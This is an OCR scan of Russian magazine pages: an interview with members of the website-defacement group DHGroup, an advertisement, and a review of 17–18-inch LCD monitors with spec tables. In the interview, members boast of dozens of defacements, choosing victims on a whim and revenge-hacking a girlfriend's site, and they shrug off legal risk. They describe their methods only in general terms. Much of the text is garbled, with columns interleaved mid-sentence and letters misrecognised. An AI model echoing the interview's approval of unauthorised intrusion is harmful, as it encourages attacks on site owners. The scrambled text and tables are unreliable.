

С HAH-rPYnnou 


DHGROUP 


Просматривая на досуге новые дефейсы Ha void.ru, 
я заметил бурную активность команды DHGroup. 
Просмотрев некоторые из их последних дефейсов, 
я обнаружил ссылочку на их сайт - 
www.dhgroup.org. Покопавшись там, я нашел их ме- 
сто обитания в IRC - irc.dal.net.ru:6667, каналы 
#DHG & #BugTrag. Туда-то я и направился, чтобы 
поболтать с мемберами команды живьем и задать 
несколько щекотливых вопросов. Изловить мне уда- 
лось четверых: D4rkGr3y, DethSpirit, Ваде$ пд и 
Yosic (в команде еще r4ShRay, j0k3r и Drewbu). 


Андрей Каролик (andrusha@sl.ru) 


Spez: 

Для начала, ребята, скажите пару слов о себе. Имя, 
возраст, место обитания (без адреса прописки), стаж и 
положение в команде. 


D4rkGr3y: 

В реале: Серега. Самый старый из членов команды. Го- 
род и возраст умалчиваются. 

Занимается/знания: IT security, web coding (JS, html, 
perl), интернет-протоколы, Linux/win оси, hardware, irc- 
скриптинг. 

В команде: Внешние контакты, взломщик, поиск уязви- 
мостей. 

Связь: grey_1999@mail.ru, 
irc.dal.net.ru:6667, #DHG. 


IRC: 


ICQ: 


540981, 


Yosic: 

В реале: Зовут Слава, npo- 
живаю в Минске. 
Занимается/знания: 
c++/pascal aka delphi, ce- 
ти, протоколы, файлы. 

В команде: Кодер, оргво- 
просы. 

Связь: yosic@dhroup.org, 
ICQ: 4560078. 


BladeSting: 

В реале: Зовут Степан, 
почти 17 лет, живу в Кали- 
нинграде. 
Занимается/знания: web 
coding GS; html), 


Marcomedia Flash. 
В команде: помощник =). 
Связь: BladeSting@dhgroup.org, ICQ: 120056105. 


DethSpirit: 

В реале: Россия, город умолчу ;). Виталий, 18 лет. В ko- 
манде уже год. 

Занимается/знания: Кодинг (Delphi), Фотожоп. И всего 
понемножку :). 

В команде: Кодер, дизайнер, взломщик. 

Связь: dethspirit@dhgroup.org, ICQ: 540381. 


Spez: 

Как пришли к хаку вообще? Просто появился комп, про- 
читали книжку или статейку о хакерах? Не каждый же, у 
кого есть комп, хакер. Почему вы этим занимаетесь? Есть 
какая-то цель или это просто хобби, как катание на катке 
зимой? Почему именно хак? Людям интересно, кто такие 
хакеры? Нужен талант, просто желание или это судьба? 


D4rkGr3y: 

Компьютерами занимаюсь о-о-очень давно. Еще со Bpe- 
мен появления win 3.11. Изначально мне было интерес- 
но не работать за ним, а просто изучать, как это все ус- 
троено. Достаточно наизучавшись, я сильно втянулся в 
underground. С тех пор считаю себя неотъемлемой его 
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частью =). Ha взломы меня толкнул избыток знаний и 
огромное количество сайтов с тупыми админами, кото- 
рые так и ждут, чтоб их кто-то дефейснул. 


BladeSting: 

Узнал про группу от друга, после чего зашел Ha канал в 
поисках этого самого друга, там и познакомился с Дар- 
ком. Так все и началось. Это сильно увлекает, уводит в 
потусторонний мир Интернета :). С помощью этих зна- 
ний можно ощущать себя в Интернете более защищен- 
ным и при этом можно видеть незащищенность других. 


DethSpirit: 

Как пришел? Дело было не хитрое, начинал с возрас- 
та 5 лет, торча в залах с 
игральными автоматами, 
потом со временем приоб- 
рел комп. Начал изучать. 
Так как просто изучать 
скучно, начал использо- 
вать изученное. В реаль- 
ной жизни все достаточно 
сложно, много проблем и 
забот, ты не имеешь 
столько власти, сколько 
тут, в виртуальном мире. 


Yosic: 

Пришел в тиму, потому что 
чего-то мне в ней нрави- 
лось. Написал письмо, 
прошел тест и все :). Для 
меня это просто хобби, но 
и научиться чему-то, ко- 
нечно, не вредно. Мне это помогает, скажем так, зара- 
батывать деньги и в реале. 


Spez: Не пугает ли перспектива заинтересованности 
органов «Р»? Почитывали ли законы :)? 


D4rkGr3y: 

Честно говоря, пугает. Я лично стараюсь поменьше све- 
тить своим ипом и вообще поменьше говорить о своей 
жизни в ri. 


DethSpirit: 
Органы «<P», которые очень любят называть себя кибер- 
полицией? Не видел таких и надеюсь, что не увижу :). 


Yosic: 

Законы не особо пугают, так как я ничего противоза- 
конного не делаю. Нужно иметь голову на плечах и ин- 
терес к тому, что делаешь, и все само приложится. 


брег: 

Допустим, юный вундеркинд имеет комп и хочет за- 
няться хаком. Как ему организовать свое обучение? 
Есть какие-то конкретные советы о сайтах, книжках, 


способах обогащения опытом и знаниями? Основные 
источники - Интернет или же книги? 


Я учился гениально просто. Заходил на яндекс, вводил 
ключевое слово «хак» и изучал все выданные ресурсы. 
А насчет чисто технической информации (языки про- 
граммирования, протоколы и т.п.) - это уже покупал 
книжки. 


Интернет, книги, журналы... 


Spez: 

Зачем создается группа? Полно других, почему He при- 
мкнуть к ним? Или делать все в одиночку, или сделать 
свою группу? Как появилась идея сделать именно эту 


группу? 
Вместе веселее ;). Это вопрос к Дарку. 


Создается группа потому, что человеку, кто ее основыва- 
ет, не нравится то, чем занимаются другие. И он основы- 
вает свою группу. А иногда просто так, от нечего делать :). 


Spez: 
Ну как вы друг друга нашли в принципе? Шли Ha AH- 
декс и вводили «вакансии в хак-группах» :)? 


У меня был сайт tipa-hacka.narod.ru. Да, ga, я был 
обычным ламером =). Так вот, содержать его было ре- 
ально трудно одному. Поэтому решил найти единомыш- 
ленников, которые бы просто помогли. А идея создать 
группу появилась уже в процессе. 


Мне помог мой друг. Он рассказывал мне о хак-группе, 
в которую его приняли. Мне стало интересно, и я тоже 
захотел попасть в эту струю. 


Spez: 

Как вы сами оцениваете значимость вашей хак-группы 
на российской хак-сцене? Место, положение, процент 
взломов? Есть, чем реально гордиться и бить в грудь, 
типа я член ОНС? 


Конечно. Хотя бы найденные нами баги в Trion, ХВСОМ, 
Eserv/2.97, AVP, Unreal IRCd ит.д. По дефейсам советую 
посмотреть архив Void.ru за июнь, там подряд пример- 
но 70 дефейсов Бу DHG. Помнится, неплохая проверка 
была для нашей группы - www.try2hack.nl :). Мы дошли 
до 9-ого за 2 дня. На данный момент ответы на ВСЕ во- 
просы лежат на нашем сайте. 


Spez: 
Есть какой-то график или план взломов или все экс- 
промтом? Какова политика поиска целей для взлома? 


Политики никакой, собрался народ, решили что-нибудь 
сделать, и пошло. 


Насчет взломов на данный момент мы сбавляем оборо- 
ты. Стараемся делать упор на новых багах и статьях. 


Spez: 
Нет, ну как вы выбираете цели? Методом тыка? Есть 
приоритеты целей? Конкретный сегмент? 


ги, com, net, org =). Я сам цели вообще не ищу. Про- 
сто кто-нибудь в чате кидает урл в приват, а там уже 
смотрим. Не трогаем сайты других команд. 


Когда жертву выбираем, тут тоже все под на- 
строение. Например, сайт www.pidor.com. Ко- 
му не хотелось сломать, а? Например, я взло- 
мал сайт своей девушки на народе, когда она 
мне изменила с другим ;). 


В ПРОДАЖЕ С 3 СЕНТЯБРЯ 
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В первом номере журнала объявлястся конкурс 
бизнес-планов «Открой свой бизнес!» 


Его победители получат до $3000 долларов, 
чтобы начать свое 4 


Главные условия конкурсо: предложить 
перспективный проект и регуларно вести 
предпринимотельский дневных, выдержкы из 
которого будут публиковаться в журноле. 
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стараюсь сделать красивый дефейс, 
чтобы людям было приятно посмот- 
реть. Так что я, как правило, больше 
тружусь не над самим взломом, а 
над его дизайном. ne | 


BladeSting: 


Spez: 

Какой процент взломов вообще? 70 нашли и взломали, Spez: 

а сколько нашли и не смогли взломать за июнь :)? Связываются типа «поймаю, уши на попу натяну» или 
по другому поводу? Деньги предлагают :)? Но в то же 


D4rkGr3y: время предложат работу и деньги - проявитесь? Может 
Примерно 1 к 2-3, но вообще тут так - везет/не везет. быть, это просто ловушка, чтобы поймать вас... 


DethSpirit: 
Spez: Kak правилс 
То есть я сейчас могу наугад дать 10 урлов, и вы с 
100% гарантией сможете сломать один из них? 


DethSpirit: . 


Spez: 

Все ломают по-разному. Кто-то меняет наполнение не- 
значительно, кто-то меняет все, кто-то шутливо иска- 
жает, кто-то пишет только о команде, кто-то еще опи- 


сывает дырку для админов. Что пишете вы? Spez: 

Кстати, почему именно дефейс? Почему не пошли ло- 
DethSpirit: мать игрушки или лицензионные проги? И какой по 
Я, как п ›, ста| b сд TI сивый дефей приоритетности дефейс в деятельности группы? На- 


сколько сложен дефейс? 


D4rkGr3y: 


DethSpirit: 


BladeSting: 


Spez: 
Основные проблемы дефейса? Что труднее всего, что 
Spez: проще всего? Какая обычная последовательность взло- 
И админы реально связываются или всем глубоко по бара- Ma любого сайта? 
бану? Были ли повторные взломы одно и того же сайта? 

D4rkGr3y: 


D4rkGr3y: 
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«юзанья» =). А также разные Роз \Рир-пиКе’и, PhpBB, 
UBB, etc... 


DethSpirit: 

Схемы для каждых сайтов могут быть разные. Для He- 
которых и банального сканера портов с известными 
уязвимостями хватает, а вот над некоторыми приходит- 
ся работать ручками. Был случай, когда R4ShRaY пы- 
тался использовать один баг в форуме и нашел в этом 
баге еще один баг. Там был баг типа 15$, а мы получи- 
ли доступ к MySQL. 


Spez: 
Понятно, что каждый сайт - свой форум, свои скрипты 
- свои дырки. Но какие дырки встречаются чаще всего? 


DethSpirit: 
Как правило, есть два типа дырок: в софте и у админа 
этого софта в голове. 


D4rkGr3y: 

На мой взгляд, наиболее часто встречаются как раз CGi- 
баги. Поэтому взлом посредством «дырявых скриптов» 
кажется наиболее приоритетным. Про это можно напи- 
сать целую статью. 


Spez: 

Какое среднее время дефейса одного сайта? Есть ли 
дедлайновое время, когда уже сайт бросается как без- 
дырочный? 


BladeSting: 

Среднее время... Часто Дарк пишет «к дефейсу готов» 
- это его стандартная фраза :). Когда как... Бывает, во- 
обще ни шиша не получается :). 


DethSpirit: 

Дедлайновое время у меня относится к моему настрое- 
нию. Если я злой, то буду с понтом дела и с мокрыми 
штанами пытаться :). 


D4rkGr3y: 
На дефейс уходит не меньше часа. Столько времени 3a- 
трачивается на его изучение. 


Yosic: 
Среднее время дефейса? Я не помню, HO обычно за ве- 
чер всегда справлялись, насколько мне известно :). 


Spez: 

А какая общая цель группы? К чему идете, товарищи? 
Или живете, пока получается? Ведь, скорее всего, все 
временно... потом работа, жена, дети :). Или это хобби 
по жизни, пока не посадят :)? 


BladeSting: 

Одни уходят, другие приходят... Загадывать Ha буду- 
щее нет смысла, потому что надежды могут не оправ- 
даться. Лучше всего жить, как живем. 


D4rkGr3y: 

Вот когда будет Ha нашем сайте 10000 уникальных по- 
сещений в день, тогда можно будет уйти на пенсию :). 
Был у нас подвиг со SpyLog’om =), но все-таки хочется 
реальных 10000 посещений. 


Вот когда будет на нашем сайте 10000 
уникальных посещений в день, тогда 
можно будет уйти на пенсию :). Былу 
нас подвиг со SpyLog’om =), но все-таки 
хочется реальных 10000 посещений. 


Yosic: 

Чего хочет Tuma? Да я, в общем, не знаю. Лично я хо- 
чу научиться от своих соратников как можно больше 
всему и передать свой опыт. 


Spez: 
Сколько тратите свободного времени на хак. Kak реша- 
ете, сколько его убить? 


DethSpirit: 

Как правило, я решаю, сколько времени сидеть за KOM- 
пом в тот момент, когда уже начинаю долбиться носом 
в тетю клаву, а она на это начинает зверски ругаться 
матом. Но так как на всех клавах антимат, то я слышу 
тока пииип-пииип, что меня, собственно, и будит :). 


Spez: 
После прочтения точно кто-то к вам захочет =). Куда 
им обращаться и что должны уметь? 


BladeSting: 

Что нужно уметь? Мы тестируем кандидата на канале и 
решаем вместе, быть ему мембером или нет. Последнее 
слово за Дарком. 


D4rkGr3y: 

А насчет новичков - нам нужны действительно спецы, 
которые хорошо шарят в определенном направлении. 
Чайников и «желающих учиться» не принимаем, толь- 
ко профи. И, естественно, требуется ЖЕЛАНИЕ ЧТО-ТО 
делать. 


Spez: 
Вы в реале-то встречаетесь или связывают только ра- 
дости взломов? 


DethSpirit: 
Да, встречаемся. Мы с JOk3r часто тусуемся и болтаем 
по телефону. 


D4rkGr3y: 
Нет. A, по крайней мере. Пытаюсь хоть как-то оста- 
ваться в тени. А вдруг Led из OCB :). 


BladeSting: 
К сожалению, в реале не могут встретиться все. Жаль, 
но хочется. 


Yosic: 
В реале никого я не видел из моей тимы :). 


Spez: 
Какие другие хак-группы вам нравятся, дружат с вами 
или, по вашему мнению, заслуживают внимания? 


D4rkGr3y: 
Мне нравятся Nerf и Void team, не считая друзей (root- 
team, FOkr, KodsWeb). 


DethSpirit: 
Аналогично, но Nerf уж больно понты кидают. 


Yosic: 
Другие хак-группы... Не знаю. Я общался с другими, мне 
нравились netwarriors, xtin, еще пара, но их уже нет :). 


Spez: 
А есть, которые HE нравятся :)? 


D4rkGr3y: 

Зайди на яндекс и введи ХАКЕРЫ. Тебе OH выдаст всех 
тех, к которым мы плохо относимся, потому что на на- 
шем сайте, например, это слово редко встречается. 52 
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ТЕСТИРОВАНИЕ 17-18” 160-МОНИТОРОВ 


test_lab (test_lab@gameland.ru) 


Неделю назад к нам в лабораторию отгрузили одиннадцать све- 
женьких LCD-MoHUTOpoB (девять семнадцатидюймовых и два во- 
семнадцатидюймовых). Мы их внимательно протестировали, 
оценили, составили таблички, подметили все плюсы и минусы 
каждого монитора, дали каждому из тестируемых устройств опи- 
сание и теперь предлагаем тебе ознакомиться с результатами 
нашего широкомасштабного тестирования. 

Обязательно посмотри таблички - они сделаны так, чтобы ты 
смог оценить параметры каждого монитора! 


СПИСОК ТЕСТИРУЕМЫХ: 
Sony SDM-S71 

Sony SDM-S81 

Sony SDM-N80 
RoverScan Maxima Pro 
Scott LC-17BL 

LG Flatron 782LE 

NEC MultiSync LCD1700V 
ITYAMA AS4316UTC 
Samsung 171p 

Samsung 172t 


Мы взяли данные из спецификации и рядом с ними написали свои 
собственные впечатления. Теперь, когда ты пойдешь покупать новый 
монитор, то сможешь разобраться, какой параметр на что влияет и 
как. 

Итак, начнем! Мы приводим различные параметры мониторов, а в 
таблицах можно найти результаты тестирования по этим параметрам. 


ГРАФИКА И ТЕКСТ 


Прогнав мониторы по куче тестов, мы, наконец, можем сказать, какие 
из них лучше всего подходят для работы с графикой и текстом. Элси- 
дишки стоят в два-три раза дороже обычных электроннолучевых мо- 
ниторов того же класса, поэтому многие их берут именно для работы, 
а не для развлечений (развлечение тоже штука важная, а работа не 
волк ;) - просто по работе требования к монитору намного выше). Вот 
основные характеристики, которые определяют степень пригодности 
монитора к решению рабочих задач. 


ЯРКОСТЬ И КОНТРАСТНОСТЬ 


(Таблица: Яркость, цветность, качество отображения фоток) 
Яркость монитора измеряют в канделлах на квадратный сантиметр. 
Канделла это плотность светового потока. Допустим, лампочка излу- 
чает какое-то количество света, можно рассеять этот свет во все сто- 
роны, тогда канделл будет мало, а можно этот свет собрать в пучок, 
тогда канделл будет больше. Этот эффект используют в фонариках. 
Чем больше канделл, тем больше яркость. Обычно в параметрах ярко- 
сти указывают, какое количество света и с какой плотностью излуча- 
ет каждый сантиметр матрицы. Если ты покрутишь яркость на своем 
мониторе, то он будет светить сильнее или слабее. 

Контрастность это количество ступенек между самым белым и са- 
мым черным объектом. Измеряется в разах. Например, белый может 
быть ярче черного в 300 раз, а может и в 400, как отрегулируешь. Ec- 
ли ты повысишь контрастность, то текст будет читаться лучше, буквы 
будут четче. А если ты понизишь контрастность, то буквы и фон ста- 
нут серыми, их не различишь. 


Размер экрана Разрешение 
Sony SDM-S71 17 дюймов 1280x1024 (точек х строк) 
Sony SDM-S81 18 дюймов 1280x1024 (точек x строк) 
Sony SDM-N80 18.1 дюймов 1280x1024 (точек x строк) 
RoverScan Maxima Pro — 17 дюймов 1280x1024 (точек x строк) 
Scott LC-17BL 17 дюймов 1280x1024 (точек x строк) 
LG Flatron 782LE 17 дюймов 1280х1024 (точек х строк) 
МЕС MultiSync LCD1700V 17 дюймов 1280х1024 (точек х строк) 
ПУАМА AS4316UTC 17 дюймов 1280x1024 (точек x строк) 
Samsung 171p 17 дюймов 1280x1024 (точек x строк) 
Samsung 172t 17 дюймов 1280x1024 (точек x строк) 
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Когда покупаешь монитор, главное, чтобы хорошо читался текст и не 
уставали глаза. Глаза обычно устают от мерцания, от размытости фо- 
куса, от слабых яркости и контрастности. 

Яркость настраивают так, чтобы она была такой же яркой, как все во- 
круг. Твоя задача взять такой монитор, у которого достаточно сил 
быть таким же ярким, как лист бумаги рядом с ним. Вредно смотреть 
телевизор в темной комнате, поскольку все вокруг темное, а он яркий 
и моргает. Если яркости у монитора мало, то глаза будут уставать от- 
того, что все вокруг светлее. Если яркости много (например, в темной 
комнате), то нужно включить лампу. 

Контраст все любят выкручивать на максимум. Чем лучше контраст - 
тем лучше читается. Но если ты еще смотришь фотки, нужно, чтобы 
цвета не искажались. Поэтому контраст выкручивают до тех пор, по- 
ка цвета не начнут искажаться. На некоторых мониках цвета сильно 
искажались, но об этом позже. 


МЕРЦАНИЕ 


(Таблица: Четкость текста на разных частотах) 

Глаза сильно устают от мерцания экрана. Для электроннолучевых 
дисплеев нужно ставить частоты обновления экрана от 85 герц, что- 
бы чувствовать себя хорошо. Но даже на такой частоте видно мерца- 
ние краем глаза. А все потому, что картинка рисуется точка за точкой 
электронным лучом. Луч бежит быстро, и глаз не успевает за ним. 
Поэтому кажется, что видишь картинку, хотя на самом деле на экране 
одна малюсенькая бегущая точка. 

У жидкокристаллических мониторов такой проблемы нет, поскольку 
все точки светят сразу. Конечно, они меняются по очереди, но нику- 


ЦЕНТР СПРАВКИ TEST_LAB 
LCD - Наша Crystal Display (дисплей на жидких 


кристаллах). 
СВТ - Cathode Ray Tube (катодно-лучевая трубка, 
или электроннолучевая трубка - ЭЛТ). 


да не исчезают и светят до следующего изменения. А все потому, что 
каждая точка состоит из кристаллика, который изменяет свойства 
света. Попробуй помахать рукой перед СЕТ, рука будет двигаться 
рывками - это стробоскопический эффект. А перед LCD, сколько ни 
маши, мерцания нет. 

У СЕТ экран покрыт люминофором, его заставляет светиться элек- 
тронный луч. В LCD стоит галогенная лампа, похожая на лампы днев- 
ного освещения. Со временем люминофор выгорает, а лампа дохнет, 
тогда y CRT и LCD садятся яркость и контрастность. 

Наши мониторы, как ты догадался, не мерцали вообще. Потому все 
так любят LCD. Хотя умели обновляться с разными частотами. Однако 
мы заметили, что частота обновления экрана у некоторых монек вли- 
яет на четкость текста, а у некоторых все остается без изменений. 


Выводы по мерцанию: 

Мерцать твой LCD не будет, в этом его большое преимущество. А 85 
герц тебе не нужно, достаточно 60. Для работы с текстом и графикой 
85 герц на жидком кристалле не сдались. Никто еще не научился рисо- 


Таблица: Спецификация 1 


Развертка Габариты Масса 
по горизонтали по вертикали 

28-92 кГц 48-85 Гц 423X399X233 мм 6.5 кг 

28-92 кГц 48-85 Гц 439X416X233 мм 6.8 кг 
28-107 кГц 48-85 Ty 432X400X195 мм 6.5 кг 

30-80 кГц 470X451X233 мм бкг 
31-80 кГц, 424X173X398 мм 9.5 кг 

30-80 кГц 400X427X235 мм 7.5 кг 

31.5-80 кГц 434X437X220 мм 6.2 кг 
31-81 Ky 411X445X210 мм 5.1 кг 
31-81 кГц 56-85 Ty — 398,2Х208,4Х443,2 мм 5.8 кг 

31-81 кГц 56-85 [Ц 385X216X396.3 мм б кг 


вать со скоростью 60 мазков в секунду и печатать со скоростью 60 уда- 
ров в секунду. И в играх, где изображение меняется чаще, тоже ничего 
особенного не видно. На некоторых мониторах была возможность ме- 
нять частоту от 60 до 80 герц. Никакой разницы! Монитор как не мер- 
цал, так и не мерцает. Только четкость изображения может меняться. 


ФОКУСИРОВКА 


(Таблица: Читаемость текста в разных разрешениях) 
Фокусировка это способность монитора нарисовать точку, а не кру- 
жочек или пятно, причем в любом месте экрана. Если фокусировка 


ТЕСТИРОВАНИЕ 17-18” LCD-MOHUTOPOB 


Выводы по фокусировке: 

Если ты хочешь наслаждаться всеми возможностями четкой картинки 
ГСО-дисплея, то запасайся еще деньгами на нормальный видеоадап- 
тер. Если ты нарыл 800 баков на хороший LCD, то придется нарыть 
еще 100 на хорошую видеокарту. А иначе ты потратишь 800 баков 
зря. 

И еще: привыкай к мелкой картинке либо ищи софт для увеличения 
иконок и шрифтов. Почти все из тестируемых девайсов на расшире- 
ниях, отличных от оптимального, ухудшали фокусировку. 


Таблица: Яркость, цветность, качество отображения фоток. 


яркость контраст ны ОНЫЙ Фотка (инвалидность) Фотка отливает 
Sony 71 250 кд/см2. _ 35001 1 _ очень E 1- я группа в красный. 
Sony SDM-S81 250 кд/см2 400:1 очень высокая 1- я группа в красный 
Sony SDM-N80_ 200 кд/см2 300:1 очень высокая 1- я группа. в красный | 
RoverScan Maxima Pro 250 кд/см2 400:1 средняя 2-я группа в малиновый 
_ Scott LC-17BL 250 кд/см2 400:1 16,7 мл не высокая 3-я група = СИНИЙ 
LG Flatron, 782LE 200 кд/см2 400:1 16,7 мл средняя 1-я группа _в красный 
jnc L700V 250 кд/см2. 400:1 16,7 мл ‘средняя 2-я группа синий 
IIYAMA AS4316 UTc 250 кд/см2 400:1 16 МЛ высокая 2-я группа синий 
_ Samsung 171p 250 кд/см2 500:1 л очень высокая _ 1-я группа ‚в красный 
Samsung 172+ 250 кд/см2 500:1 очень высокая 1-я группа не отливает 


плохая, то текст размыт и плохо читается, от этого глаза болят силь- 
нее всего. А все потому, что глазки пытаются сфокусироваться, для 
этого напрягают мышцы и сдавливаются. Потом мышцы устают, и ты 
уже не можешь разобрать не только размытости на мониторе, но и 
обычные четкие вещи вокруг. 

Злые языки говорят, что у LCD идеальная фокусировка. Ничего подоб- 
ного! Она может быть идеальной, только если ты поставил любимое 
разрешение твоего монитора. Наши - семнашки и восемнашки - лю- 
бят разрешение 1280X1024. Если ты ставишь разрешение мельче, то 
текст начинает размывать. Все привыкли работать на 17-19» на раз- 
решении 1024X768, потому что больше все таким мелким становится, 
не разберешь. На LCD с большим разрешением смериться проще, так 
как фокус идеальный и все видно очень четко. Но что делать тем, кто 
не любит мелочь? Нужна либо программа для тотального увеличения 
шрифтов и иконок, либо надо ставить разрешение меньше. 

Вот мы и попробовали потестить наши моньки на разных низких раз- 
решениях. Игры играются на всех разрешениях великолепно. А вот с 
чтением текста бывают проблемы. Текст на низких разрешениях на- 
чинает размываться, и вся прелесть хваленого идеального фокуса 
жидкокристалки теряется. 


Таблица: Геометрия, энертность (документация/впечатления). 


| co Геометрия  Инертность Впечатления 

_ Sony SDM-S71 почти незаметно 25. MC _ 2-Зстроки. 

_ Sony SDM-S81 пузыри по углам 25 мс 2-Зстроки 

_ Sony $0М-№80. пузыри по улам 35 мс 2-Зстроки 

_ Воуег5сап Maxima Рго почти незаметно 40 мс 5-бстрок 

Scott LC-17BL весь экран 45 мс весь экран 
LG Flatron 782LE почти незаметно 40 мс 2-Зстроки 

_ МЕС MultiSy 00\ правый край = 40 mc 8-10строк 
ПУАМА AS4316UTC почти незаметно 40 мс 2-Зстроки 

_ батзийд 171p почти незаметно 25. Mc. 2-Зстроки 
Samsung 1724 почти незаметно 25мс — почти не заметно 


И еще жидкокристалки сильно чувствительны к видеоадаптеру. Ha 
плохом адаптере на экране появятся размытости, полосы и даже пят- 
на. Поэтому для тестирования мы собрали мощный стенд. 


ОПИСАНИЕ ТЕСТОВОГО СТЕНДА: 
Материнская плата: ASUS P4T-E 
Процессор: Pentium 4 1.4 Ггц 
Память: 256 RIMM 
Жесткий диск: IBM DTLA 307045 
Видеокарта: ATI Radeon 8500. 
ПО: Nokia Monitor Test 


Несомненно, наиболее важную роль в тестировании любых мониторов 
играет видеокарта. Она должна корректно работать во всех разреше- 
ниях и выдавать четкую картинку без каких-либо искажений. Radeon 
8500 отвечает всем этим требованиям, так что списывать какие-либо 
глюки на слабенькую видюху не пришлось. Также для максимально 
объективной оценки использовалось специализированное ПО для до- 
тошной проверки качества работы тестируемых ЖК-панелей. 


ЗАПАЗДЫВАНИЕ 


(Таблица: Геометрия, инертность (документация/впечатления)) 
Эта штука новая. Дело в том, что электронный пучок можно гонять с 
очень большой скоростью. Поэтому никаких ощутимых задержек у 
СВТ-мониторов нет. A вот у [С)-монитора каждый элемент переклю- 
чается с ограниченной скоростью. А в результате двигающиеся объ- 
екты на экране оставляют за собой шлейф. 

Никакой из наших супертестов это тестить не умел так, чтобы можно 
было что-то отличить. А штука это очень болезненная при работе с 
текстом. Самый лучший тест - это мышка со скрулингом. Дергаешь 
страничку туда-сюда и смотришь, сколько строчек залипает. 

На самых классных мониторах оставалось 2-3 строчки, это не парит 
абсолютно! На CRT тоже на самом деле 2-3 строки залипают. Hy а ес- 
ли задержка больше, то текст читать начинает раздражать. Сам думай 
- двинул, все смазалось, потерял место, где читал. 


Вывод по запаздыванию: 
Хочешь читать тексты и не злиться, бери монитор с задержкой MeHb- 
ше, чем 40 мс (миллисекунд). 


ЦВЕТНОСТЬ 


(Таблица: Яркость, цветность, качество отображения фоток) 
Эти параметры важны для тех, кто собрался юзать элсидишку в 
PhotoShop, для тех, кто хочет работать с фотографиями. Если матри- 
ца темная, то многие детали на фото пропадают. Еще нужно адекват- 
но отображать цвета. Проще всего это проверить на обычной фото- 
графии с кожей человека. Раньше так проверяли цветопередачу на 
цифровых фотокамерах, у них до сих пор с этим проблема. Мы ис- 
пользовали фотографию руки. По нашему субъективному мнению, 
все протестированные жидкокристалки уступают электроннолуче- 
вым. 


Долго ломали голову, почему же так, что же нам не нравиться? А по- 
том поставили рядом LCD и CRT, включили на обоих моньках палитру 
цветов и все поняли. У электроннолучевого монитора градиенты 
плавные и равномерные, а у жидкокристаллического собрата они бо- 
лее резкие. Цвета на градиенте жидкокристалки переходят то более 


ИТОГ 

При покупке LCD важно отметить: 

1. Как монька справится с фоткой. 

2. Есть ли темные или светлые пиксели (на 
темном и светлом экране). 


. Скрулится ли текст (задержка меньше 40 мс). 

. Поворачивается ли экран, чтобы можно было 
увидеть страничку целиком. 

. Есть ли цифровой вход. 
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резко, то менее резко, а главное - неравномерно. Конечно, можно пы- 
таться это настроить, HO вряд ли что-то получится. 


Эти искажения палитры в игрушках совсем незаметны. Наоборот, иг- 
ры бродятся и стреляются намного круче, чем на CRT. LCD четкий и 
плоский, поэтому кажется, что смотришь игрушку через окошко. 
Грань виртухайной реальности стирается совершенно! Мы квачились 
и анриалились до помутнения рассудка. Осторожно, с LCD время ле- 
тит незаметно! 


Таблица: Четкость текста на разных частотах. 


60Hz 75Hz 85Hz 
Sony SDM-S71 хорошо хорошо нет 
Sony SDM-S81 XOpowo HeT HeT 
Sony SDM-N80 хорошо нет нет 
RoverScan Maxima Pro хорошо хорошо лучше 
Scott LC-17BL хорошо хорошо ГЛЮК 
LG Flatron 782LE хорошо лучше нет 
NEC MultiSync ЕС01700\У — хорошо хорошо нет 
ПУАМА AS4316UTC хорошо хорошо нет 
Samsung 171p хорошо хорошо нет 
Samsung 1724 хорошо хорошо нет 


Почти все мониторы показали великолепнейшие игровые качества! 


Игрушка от фотографии отличается способом заливки. Там все-таки 
все градиенты более-менее равномерные. А на фотографии все со- 
стоит из мелких лоскутков. И если у тебя цвета распределены нерав- 
номерно, то фотка рассыпается. 


Пришлось давать группы инвалидности по демонстрации фоток лси- 
дишкам. Хотя такие группы можно смело присвоить некоторым эле- 
ктроннолучевым. Мы загружали обычные фотографии с человечес- 
кими лапами и смотрели на них. То, что они отливали в синеву или 
красноту, еще можно поправить. Но когда на ручках появлялась сыпь 
(те самые лоскутки), тут уж ничего не сделаешь - инвалид. 

Первая группа фотоинвалидности приравнивается к качеству сред- 
них CRT. Когда смотришь фотки, приходится задирать на максимум 
яркость и контрастность монитора. А все потому, что фотки обычно 
темные и на них много деталей. Но чем ярче изображение, тем вид- 
нее сыпь! Зайди в любой магазин, где на стенде стоят включенные 
лсидишки, и ты поймешь, о чем мы. Продавцы очень любят задрать 
яркость с контрастностью на максимум и крутить пейзажи, животных 
и другие фотки. Так вот, у мониторов из первой группы инвалиднос- 
ти все очень хорошо. Можно поставить на максимум яркость с кон- 
трастом, и изображение будет все равно естественным. 


У мониторов второй группы, если сделать поярче и поконтрастнее, 
сыпь начинает сливаться в однотонные, яркие области. Кажется, что 
фотку очень-очень сильно пожал JPEG или GIF. На фотке появляются 
ступеньки вместо плавных переливов. 


Мониторы третьей группы показывали фотку еще хуже, чем монито- 
ры второй группы. 


Выводы по цветности: 

Если компьютер нужен тебе, чтобы гаматься в игры, печатать рефера- 
ты, рисовать, качать софт с Инета и смотреть DVD, то подойдет любой 
из наших мониторов. Если ты профессиональный фотограф или ди- 


800X600 1024X768 

Sony SDM-S71 не читается (размыто) — не читается (размыто) 
Sony SDM-S81 читается читается 

Sony SDM-N80 читается читается 
RoverScan Maxima Pro читается читается 

Scott LC-17BL читается читается (мутновато) 
LG Flatron 782LE читается читается 

NEC MultiSync LCD1700V читается читается 
ПУАМА AS4316UTC читается читается 
Samsung 1724 читается читается 


Samsung 171р читается (четко) читается (четко) 
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зайнер, TO, может быть, имеет смысл пока оставаться Ha CRT либо по- 
купать более дорогие LCD. 


ГЕОМЕТРИЯ 


(Таблица: Геометрия, инертность (документация/впечатления)) 
Геометрия это способности монитора отображать прямые, квадраты и 
круги. То есть мы смотрели, как монитор показывает простые геоме- 
трические фигуры. Для этого в Nokia Monitor Test есть специальная 
сеточка с кружочками. Когда выводишь на монитор такую сеточку, то 
в идеале все линии должны быть параллельны, клетки должны быть 
квадратами, а не прямоугольниками, а круги не должны быть овала- 
МИ. 


Геометрия очень важна для чертежников и художников. Им очень хо- 
чется, чтобы прямые линии были прямыми. Например, нарисовал ты 
прямую от руки, передвинул изображение в центр экрана, а она уже 
кривая! Неудобно! Можно, конечно, привыкнуть, но все равно хочет- 
ся, чтобы было ровно как на бумаге. До появления LCD у большинст- 
Ba СВТ-мониторов геометрию можно было назвать безобразной. Ho 
как-то привыкали. 


Разработчики и продавцы лсидишек говорят об ИДЕАЛЬНОЙ геомет- 
рии. А вот и неправда! Искажения есть! Конечно, они ЗНАЧИТЕЛЬНО 
меньше, чем на электроннолучевых мониторах, но они все равно 
есть. 


Выводы по геометрии: 

Даже у самого слабого лсидишника геометрия может быть получше, 
чем у профессионального электроннолучевого монитора. Ради спра- 
